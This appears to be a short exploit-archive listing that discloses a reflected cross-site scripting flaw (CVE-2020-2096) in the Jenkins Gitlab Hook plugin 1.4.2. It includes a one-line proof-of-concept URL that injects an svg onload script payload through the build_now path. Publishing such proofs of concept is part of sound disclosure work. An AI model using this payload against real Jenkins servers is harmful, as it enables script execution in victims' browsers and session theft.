Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Jenkins Gitlab Hook plugin version 1.4.2 suffers from a cross site scripting vulnerability.


MD5 | d7c42a672200860ffa5b54b38f3a89f8

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Related Posts